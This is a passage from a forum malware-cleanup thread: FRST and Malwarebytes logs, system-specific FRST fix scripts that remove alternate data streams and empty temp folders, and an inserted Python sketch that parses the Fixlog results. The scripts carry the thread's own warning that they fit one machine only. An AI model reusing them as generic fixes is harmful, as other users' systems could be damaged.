FirewallRules: [{8E1288D1-FF8B-43CF-B774-BAF7368A878E}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.86.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{07AEC99C-D78B-40D8-81B3-B6A57F65D5B2}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.86.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E69E5D28-B7DD-46AB-BEAB-C839E5454B7D}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.86.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{B37C3BEA-90A8-4571-B32B-A3D32D66E996}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.86.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{01812E29-A7AD-4EE9-8996-E4D05D2A9287}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Animal Royale\Super Animal Royale.exe () [File not signed]
FirewallRules: [{630E1402-F874-4FED-87A1-27FF1098A671}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Animal Royale\Super Animal Royale.exe () [File not signed]
 
==================== Restore Points =========================
 
18-07-2022 16:49:57 Scheduled Checkpoint
 
==================== Faulty Device Manager Devices ============
 
 
==================== Event log errors: ========================
 
Application errors:
==================
Error: (07/21/2022 03:23:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x46e0
Faulting application start time: 0x01d89d4fde07bc1b
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 48c9ba1f-c205-446b-9247-20458cfebef7
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/20/2022 10:32:38 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program EpicGamesLauncher.exe version 14.1.4.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: d8c
 
Start Time: 01d89ca434ea1caa
 
Termination Time: 4294967295
 
Application Path: C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
 
Report Id: ad46e099-7131-424c-a75c-05dc99cacc33
 
Faulting package full name: 
 
Faulting package-relative application ID: 
 
Hang type: Top level window is idle
 
Error: (07/20/2022 06:54:54 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x26bc
Faulting application start time: 0x01d89ca42b82d203
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 07a10fe0-3fa3-4c43-ac44-00c630cdb48a
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/20/2022 06:53:02 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_CDPSvc, version: 10.0.19041.1806, time stamp: 0x7dcad237
Faulting module name: cdp.dll, version: 10.0.19041.1826, time stamp: 0xe5ddbd74
Exception code: 0xc0000005
Fault offset: 0x00000000001451ff
Faulting process id: 0x1520
Faulting application start time: 0x01d89c829cc7efa7
Faulting application path: C:\WINDOWS\system32\svchost.exe
Faulting module path: c:\windows\system32\cdp.dll
Report Id: 50c9c99a-2db9-4d51-bb30-dcebff169f98
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/20/2022 02:54:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x27b4
Faulting application start time: 0x01d89c829f608f78
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 4c2824dc-054c-458b-bf06-acee4e0fbe48
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/20/2022 12:09:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x2560
Faulting application start time: 0x01d89c6b86e1e516
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 36268887-0b3d-4e32-858a-d948616f78fa
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/19/2022 04:53:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x1b84
Faulting application start time: 0x01d89bca0673daf3
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: c471ce9d-4454-44fc-a611-f861db18ddb8
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/19/2022 04:46:58 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine QueryFullProcessImageNameW.  hr = 0x8007001f, A device attached to the system is not functioning.
.
 
 
Operation:
   Executing Asynchronous Operation
 
Context:
   Current State: DoSnapshotSet
 
 
System errors:
=============
Error: (07/21/2022 03:22:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error: 
This driver has been blocked from loading
 
Error: (07/21/2022 03:22:23 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Miggy\AppData\Local\Temp\ehdrv.sys
 
Error: (07/21/2022 03:22:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error: 
This driver has been blocked from loading
 
Error: (07/21/2022 03:22:23 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Miggy\AppData\Local\Temp\ehdrv.sys
 
Error: (07/21/2022 03:22:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error: 
This driver has been blocked from loading
 
Error: (07/21/2022 03:22:23 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Miggy\AppData\Local\Temp\ehdrv.sys
 
Error: (07/21/2022 03:22:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error: 
This driver has been blocked from loading
 
Error: (07/21/2022 03:22:23 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Miggy\AppData\Local\Temp\ehdrv.sys
 
 
Windows Defender:
================
Date: 2022-07-17 18:02:02
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2022-07-15 19:09:08
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2022-07-14 11:53:58
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2022-07-11 19:01:40
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2022-07-10 18:38:28
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
==================== Memory info =========================== 
 
BIOS: American Megatrends Inc. F50 11/28/2019
Motherboard: Gigabyte Technology Co., Ltd. A320M-S2H-CF
Processor: AMD Ryzen 5 3600 6-Core Processor 
Percentage of memory in use: 90%
Total physical RAM: 8139.07 MB
Available physical RAM: 779.42 MB
Total Virtual: 21451.07 MB
Available Virtual: 2913.88 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:475.83 GB) (Free:98.4 GB) (Model: TEAM T253X2512G) NTFS
 
\\?\Volume{590e5d8c-1754-4989-bc02-b0320b4dd94a}\ () (Fixed) (Total:0 GB) (Free:0 GB) 
\\?\Volume{2461b620-0642-4655-b8ff-4e37ffcad3aa}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS
\\?\Volume{31c301e6-2876-4924-31af-e66339e3d9f1}\ () (Fixed) (Total:0.01 GB) (Free:0 GB) NTFS
\\?\Volume{a7ea1218-f889-4125-8806-9e75e9dba896}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
 
==================== MBR & Partition Table ====================
 
==========================================================
Disk: 0 (Protective MBR) (Size: 476.9 GB) (Disk ID: 00000000)
 
Partition: GPT.
Attempted reading MBR returned 0 bytes.
 Could not read MBR for disk 1.
 
==================== End of Addition.txt =======================


#12 axe0

  • Malware Response Team
  • 2,059 posts
  • Gender:Male
  • Location:Netherlands
  • Local time:03:17 AM

Posted 23 July 2022 - 02:26 PM

Please do the following.

Run FRST Fix
Warning: This script was created for this specific system. Attempting to use the fix on another system may cause damage to the system.
  • Right-click FRST64.exe then click "Run as administrator".
  • Select the entire content of the code below including "Start::" and "End::", right click and select "Copy"
  • Click Fix button once and wait
  • When finished, it will produce a log called Fixlog.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.
Start::
CloseProcesses:
EmptyTemp:
AlternateDataStreams: C:\ProgramData\NvcDispCorePlugin.log:AAE9D2281E [4298]
AlternateDataStreams: C:\ProgramData\NvcDispCorePlugin.log_backup1:E79F04DA79 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplay.ContainerLocalSystem.log:5ACBC90093 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1:A416BDA264 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log:204739A7F2 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log_backup1:C3CA1050CA [4298]
AlternateDataStreams: C:\ProgramData\rsEngine.config.backup:CF02139FF4 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk:0BBB729577 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk:638138415C [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk:C56174E6CE [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk:8096E45125 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk:E77773B271 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk:578370639A [4298]
End::
----------------------------------------------
 
Malwarebytes
Please download Malwarebytes to your desktop.
  • Right click the downloaded Malwarebytes file and choose Run as Administrator.
  • Click Yes when you see the User Account Control prompt.
  • Follow the prompts to install the program.
  • Right in the top in Malwarebytes click on the settings icon, click Check for updates to download the latest updates.
  • Click Scan.
  • If potential threats have been detected, check all listed items and click Quarantine Selected.
  • While you're still on the Scan tab, click View Report > Export > Copy to clipboard and paste the content of the log in your next post.
===============================================
 
In your next post
In your next post, please include the following. Make sure to copy and paste any requested logs unless asked to attach it.
  • Content of fixlog.txt
  • Content of Malwarebytes log
  • How is your computer behaving with the randomly opening and closing of Chrome browser?

Edited by axe0, 23 July 2022 - 02:28 PM.
Fixed formatting

Kind regards,
Axe0

#13 miggybruh

Posted 26 July 2022 - 03:13 PM

Here is fixlog.txt

Fix result of Farbar Recovery Scan Tool (x64) Version: 21-07-2022
Ran by Miggy (26-07-2022 12:53:53) Run:3
Running from C:\Users\Miggy\Downloads
Loaded Profiles: Miggy
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
Start::
CloseProcesses:
EmptyTemp:
 
AlternateDataStreams: C:\ProgramData\NvcDispCorePlugin.log:AAE9D2281E [4298]
AlternateDataStreams: C:\ProgramData\NvcDispCorePlugin.log_backup1:E79F04DA79 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplay.ContainerLocalSystem.log:5ACBC90093 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1:A416BDA264 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log:204739A7F2 [4298]
AlternateDataStreams:
C:\ProgramData\NVDisplayContainerWatchdog.log_backup1:C3CA1050CA [4298]
AlternateDataStreams: C:\ProgramData\rsEngine.config.backup:CF02139FF4 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk:0BBB729577 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk:638138415C [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk:C56174E6CE [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [4298]
AlternateDataStreams:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk:8096E45125 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk:E77773B271 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk:578370639A [4298]
 
End::
 
*****************
 
Processes closed successfully.
C:\ProgramData\NvcDispCorePlugin.log => ":AAE9D2281E" ADS removed successfully
C:\ProgramData\NvcDispCorePlugin.log_backup1 => ":E79F04DA79" ADS removed successfully
C:\ProgramData\NVDisplay.ContainerLocalSystem.log => ":5ACBC90093" ADS removed successfully
C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1 => ":A416BDA264" ADS removed successfully
C:\ProgramData\NVDisplayContainerWatchdog.log => ":204739A7F2" ADS removed successfully
AlternateDataStreams: => Error: No automatic fix found for this entry.
"C:\ProgramData\NVDisplayContainerWatchdog.log_backup1:C3CA1050CA [4298]" => not found
C:\ProgramData\rsEngine.config.backup => ":CF02139FF4" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini => ":B1DA6C571C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk => ":7661CCE9BF" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk => ":0BBB729577" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk => ":638138415C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk => ":C56174E6CE" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini => ":41964AA945" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk => ":BE32D07BC5" ADS removed successfully
AlternateDataStreams: => Error: No automatic fix found for this entry.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [4298]" => not found
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => ":8096E45125" ADS removed successfully
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk" => ":E77773B271" ADS not found.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk => ":578370639A" ADS removed successfully
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 53028474 B
Java, Discord, Steam htmlcache => 613865740 B
Windows/system/drivers => 16701871 B
Edge => 0 B
Chrome => 440845335 B
Firefox => 0 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 4130 B
NetworkService => 31258 B
Miggy => 35196042141 B
 
RecycleBin => 34746675 B
EmptyTemp: => 33.9 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 12:55:10 ====

Here is the Malwarebytes log
Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 7/26/22
Scan Time: 12:58 PM
Log File: 63c88364-0d1d-11ed-97ac-b42e99e8c1bf.json
 
-Software Information-
Version: 4.5.11.202
Components Version: 1.0.1716
Update Package Version: 1.0.57783
License: Trial
 
-System Information-
OS: Windows 10 (Build 19044.1826)
CPU: x64
File System: NTFS
User: MIGGYPC\Miggy
 
-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 320930
Threats Detected: 5
Threats Quarantined: 0
Time Elapsed: 5 min, 21 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 2
PUP.Optional.RestMinder, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RestMinder_RASAPI32, No Action By User, 2021, 1070718, 1.0.57783, , ame, , , 
PUP.Optional.RestMinder, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RestMinder_RASMANCS, No Action By User, 2021, 1070718, 1.0.57783, , ame, , , 
 
Registry Value: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 2
PUP.Optional.RestMinder, C:\Users\Miggy\AppData\Local\Gh\RestMinder.exe_Url_u4ip2c5nzthfhomuge0pi1pxxhpotbdx\1.0.0.1, No Action By User, 2021, 1070720, , , , , , 
PUP.Optional.RestMinder, C:\USERS\MIGGY\APPDATA\LOCAL\Gh\RestMinder.exe_Url_u4ip2c5nzthfhomuge0pi1pxxhpotbdx, No Action By User, 2021, 1070720, 1.0.57783, , ame, , , 
 
File: 1
PUP.Optional.RestMinder, C:\Users\Miggy\AppData\Local\Gh\RestMinder.exe_Url_u4ip2c5nzthfhomuge0pi1pxxhpotbdx\1.0.0.1\user.config, No Action By User, 2021, 1070720, , , , , 4289D301FB845C8CA46594C414552191, 0592B518B0E2DD9188D85744762627B70DD4861AB178824F24F790D3BA32D960
 
Physical Sector: 0
(No malicious items detected)
 
WMI: 0
(No malicious items detected)
 
 
(end)
 
 
Chrome no longer opens and closes randomly and is functioning normally.


#14 axe0

Posted 27 July 2022 - 11:02 AM

Good news.

It looks like a part of the fix didn't go through properly. Please do the following. After the fix below, please run a new scan with FRST; I'd like to have a look at the logs one more time.


Run FRST Fix

Warning: This script was created for this specific system. Attempting to use the fix on another system may cause damage to the system

  • Right-click FRST64.exe then click "Run as administrator".

  • Select the entire content of the code below including "Start::" and "End::", right click and select "Copy"

  • Click Fix button once and wait

  • When finished, it will produce a log called Fixlog.txt in the same directory the tool was run from.

  • Please copy and paste the log in your next reply.

Start::
CloseProcesses:
AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log_backup1:C3CA1050CA [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [4298]
End::
 

 

===============================================

 

In your next post

In your next post, please include the following. Make sure to copy and paste any requested logs unless asked to attach it.

  • Content of fixlog.txt

  • Content of FRST.txt

  • Content of Addition.txt

     


Kind regards,
Axe0
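
An added example, not part of the original thread and not FRST's own code: in the Fixlog from post #13, the two entries that failed are the two whose `AlternateDataStreams:` directive and path sit on separate lines in the echoed fixlist, and this Python sketch finds such split entries and sorts the result lines into removed, already absent, and needing a retry. It assumes the result-line wording seen in that log; the embedded samples are shortened excerpts from it, and the function names are hypothetical.

```python
import re

# Result-line shapes, taken from the wording of the Fixlog posted in this thread.
REMOVED = re.compile(r'^"?(?P<path>.+?)"? => ":(?P<stream>[^"]+)" ADS removed successfully$')
ABSENT = re.compile(r'^"?(?P<path>.+?)"? => ":(?P<stream>[^"]+)" ADS not found\.?$')
UNPARSED = re.compile(r'^(?P<directive>\w+): => Error: No automatic fix found for this entry\.$')
ORPHAN = re.compile(r'^"(?P<entry>.+)" => not found$')

# Shortened excerpt of the "fixlist content" section of the Fixlog in post #13.
SAMPLE_FIXLIST = r'''
Start::
CloseProcesses:
EmptyTemp:
AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log:204739A7F2 [4298]
AlternateDataStreams:
C:\ProgramData\NVDisplayContainerWatchdog.log_backup1:C3CA1050CA [4298]
AlternateDataStreams: C:\ProgramData\rsEngine.config.backup:CF02139FF4 [4298]
End::
'''

# Shortened excerpt of the result section of the same Fixlog.
SAMPLE_RESULTS = r'''
Processes closed successfully.
C:\ProgramData\NVDisplayContainerWatchdog.log => ":204739A7F2" ADS removed successfully
AlternateDataStreams: => Error: No automatic fix found for this entry.
"C:\ProgramData\NVDisplayContainerWatchdog.log_backup1:C3CA1050CA [4298]" => not found
C:\ProgramData\rsEngine.config.backup => ":CF02139FF4" ADS removed successfully
AlternateDataStreams: => Error: No automatic fix found for this entry.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [4298]" => not found
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => ":8096E45125" ADS removed successfully
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk" => ":E77773B271" ADS not found.
'''


def find_split_entries(fixlist_text, arg_directives=("AlternateDataStreams",)):
    """Return re-joined entries whose directive lost its argument to a line break.

    Only directives named in arg_directives are checked, because directives
    such as CloseProcesses: and EmptyTemp: legitimately stand alone.
    """
    lines = [raw.strip() for raw in fixlist_text.splitlines()]
    joined = []
    for current, following in zip(lines, lines[1:]):
        name = current[:-1]
        if current.endswith(":") and name in arg_directives:
            # A drive path starts with one letter and a colon; a directive
            # name has at least two letters before its colon.
            if following and not re.match(r"^[A-Za-z]{2,}:", following):
                joined.append(f"{name}: {following}")
    return joined


def classify_results(results_text):
    """Sort Fixlog result lines into removed, absent and retry buckets."""
    out = {"removed": [], "absent": [], "retry": []}
    pending = None  # directive reported as having no automatic fix
    for line in (raw.strip() for raw in results_text.splitlines()):
        unparsed = UNPARSED.match(line)
        if unparsed:
            pending = unparsed["directive"]
            continue
        orphan = ORPHAN.match(line)
        if orphan and pending:
            # The path that followed the bare directive was reported on its
            # own; re-join the two into the entry that was intended.
            out["retry"].append(f"{pending}: {orphan['entry']}")
        else:
            for key, pattern in (("removed", REMOVED), ("absent", ABSENT)):
                hit = pattern.match(line)
                if hit:
                    out[key].append((hit["path"], hit["stream"]))
                    break
        pending = None
    return out


if __name__ == "__main__":
    for entry in find_split_entries(SAMPLE_FIXLIST):
        print("split in fixlist:", entry)
    report = classify_results(SAMPLE_RESULTS)
    print(len(report["removed"]), "streams removed")
    print(len(report["absent"]), "streams already absent")
    for entry in report["retry"]:
        print("retry:", entry)
```

The two `retry` entries it rebuilds from the excerpt are the same two lines that appear in the follow-up fixlist in post #14.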

#15 miggybruh

Posted 30 July 2022 - 03:30 PM

Here is fixlog.txt
Fix result of Farbar Recovery Scan Tool (x64) Version: 27-07-2022
Ran by Miggy (30-07-2022 13:14:27) Run:4
Running from C:\Users\Miggy\Downloads
Loaded Profiles: Miggy
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
Start::
CloseProcesses:
AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log_backup1:C3CA1050CA [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [4298]
End::
 
*****************
 
Processes closed successfully.
C:\ProgramData\NVDisplayContainerWatchdog.log_backup1 => ":C3CA1050CA" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk => ":980850BA8A" ADS removed successfully
 
 
The system needed a reboot.
 
==== End of Fixlog 13:14:29 ====
Here is FRST.txt
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 27-07-2022
Ran by Miggy (administrator) on MIGGYPC (Gigabyte Technology Co., Ltd. A320M-S2H) (30-07-2022 13:25:08)
Running from C:\Users\Miggy\Downloads
Loaded Profiles: Miggy
Platform: Microsoft Windows 10 Home Version 21H2 19044.1826 (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe ->) (Adobe Inc. -> ) C:\Program Files (x86)\Adobe\Adobe Sync\CoreSync\CoreSync.exe
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud Helper.exe <2>
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\Adobe Installer.exe
(C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2>
(C:\Program Files (x86)\ONN\onn.exe ->) () [File not signed] C:\Program Files (x86)\ONN\KbDaemon.exe
(C:\Program Files (x86)\Origin\Origin.exe ->) (Electronic Arts, Inc. -> ) C:\Program Files (x86)\Origin\QtWebEngineProcess.exe <3>
(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7>
(C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe <2>
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe
(C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\libs\node.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
